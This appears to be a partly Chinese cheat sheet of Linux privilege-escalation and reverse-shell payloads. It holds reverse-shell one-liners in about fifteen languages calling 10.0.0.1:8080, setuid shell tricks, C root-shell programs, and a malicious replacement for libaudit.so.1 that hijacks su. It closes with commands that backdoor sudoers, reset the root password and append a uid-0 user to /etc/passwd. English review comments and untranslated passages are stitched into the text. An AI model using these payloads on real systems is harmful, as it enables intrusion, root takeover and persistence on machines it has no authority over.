
执行负载


Bash

# Copies bash to /tmp and marks the copy setuid/setgid with chmod +s.
# The copy only runs as root if root made it (setuid takes the file owner's
# uid); a setuid copy of a shell in /tmp is a well-known persistence artefact.
cp /bin/bash /tmp/b && chmod +s /tmp/b
# -p keeps bash from resetting the effective uid back to the real uid.
/bin/b -p # Maintains root privileges from suid; working in Debian & Ubuntu

C

Shell

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
0<&196;exec 196<>/dev/tcp/10.0.0.1/8080; sh <&196 >&196 2>&196

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",8080);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 8080
nc -e /bin/bash 10.0.0.1 8080
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

xterm -display 10.0.0.1:1
xterm -display 10.0.0.1:1 -e /bin/bash

socat

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:8080
socat file:`tty`,raw,echo=0 tcp-listen:8080

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 8080 0/tmp/p
telnet 10.0.0.1 8080 | /bin/bash | telnet 10.0.0.1 8081

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Node.js

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/bash -i <&3 >&3 2>&3');"

MySQL

\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

AWK

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'

AWK (alternative)

awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'
awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'

AWK (alternative)

awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'
awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'
//gcc payload.c -o payload
// NOTE(review): no headers are included, so setresuid() and system() rely
// on implicit declarations.
int main(void){
// Sets the real, effective and saved uid to 0. Roughly, this only succeeds
// when the process already holds uid 0 in one of those ids (e.g. a setuid-root
// binary) or has CAP_SETUID. The return value is not checked, so on failure
// the shell below simply runs with the caller's own uid.
setresuid(0, 0, 0); //Set as user suid user
// system() runs the shell through /bin/sh -c on the caller's terminal.
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
// Makes the effective uid equal to the real uid. No privilege is gained
// here; for a setuid-root binary this permanently drops the elevated euid.
// NOTE(review): presumably meant for the case where the real uid is already
// the target user — confirm against how the caller runs it.
setuid(getuid());
// system() is declared in <stdlib.h>, which is not included above.
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

// Switches every uid to the hard-coded id, then replaces itself with bash.
int main(void) {
// argv for the new image; the array is sized 10 but only 3 slots are used.
char *const paramList[10] = {"/bin/bash", "-p", NULL};
// Target uid is fixed at compile time.
const int id = 1000;
// An unprivileged caller may only pick ids it already holds; the result is
// not checked, so bash may start with the original ids instead.
setresuid(id, id, id);
// On Linux a NULL envp is treated as an empty environment. -p only matters
// when effective != real uid, which the call above makes equal — presumably
// kept defensively.
execve(paramList[0], paramList, NULL);
// Reached only if execve() failed.
return 0;
}

覆盖文件以提升权限

常见文件

  • /etc/passwd 中添加带密码的用户
  • /etc/shadow 中更改密码
  • /etc/sudoers 中将用户添加到sudoers
  • 通过 docker 套接字滥用 docker,该套接字通常位于 /run/docker.sock 或 /var/run/docker.sock

覆盖库文件

检查某个二进制文件使用的库文件,例如 /bin/su

ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)

在这种情况下,让我们尝试冒充 /lib/x86_64-linux-gnu/libaudit.so.1
因此,检查 su 二进制文件使用的此库的函数:

objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000              audit_open
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd

符号 audit_open、audit_log_user_message、audit_log_acct_message 和 audit_fd 可能来自于 libaudit.so.1 库。由于恶意共享库将覆盖 libaudit.so.1,这些符号应该存在于新的共享库中,否则程序将无法找到符号并退出。

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

// Names su imports from libaudit.so.1 (see the objdump listing above).
// They are defined as plain int objects so the dynamic linker can resolve
// them; nothing here implements the real library's behaviour.
int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

// Constructor attribute: inject() runs when the library is loaded,
// i.e. before the loading program's main().
void inject()__attribute__((constructor));

void inject()
{
// Return values are unchecked; these calls only take effect when the
// loading process already runs as uid/gid 0 or holds the matching capability.
setuid(0);
setgid(0);
system("/bin/bash");
}

现在,只需调用 /bin/su,您将获得 root 权限的 shell。

脚本

您能让 root 执行某些操作吗?

将 www-data 添加到 sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

更改 root 密码

To change the root password, you can use the following command:

要更改 root 密码,可以使用以下命令:

sudo passwd root

You will be prompted to enter the new password twice. After successfully changing the password, you can log in as root using the new password.

echo "root:hacked" | chpasswd

将新的root用户添加到/etc/passwd文件中

To add a new root user to the /etc/passwd file, you can follow these steps:

  1. Open the /etc/passwd file using a text editor.
  2. Locate the line that starts with root and copy it.
  3. Paste the copied line at the end of the file.
  4. Modify the username to a unique name for the new root user.
  5. Change the user ID (UID) to 0 to assign root privileges.
  6. Change the group ID (GID) to 0 to assign root group privileges.
  7. Update the home directory and shell fields if necessary.
  8. Save the changes and exit the text editor.

After completing these steps, you will have successfully added a new root user to the /etc/passwd file.

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd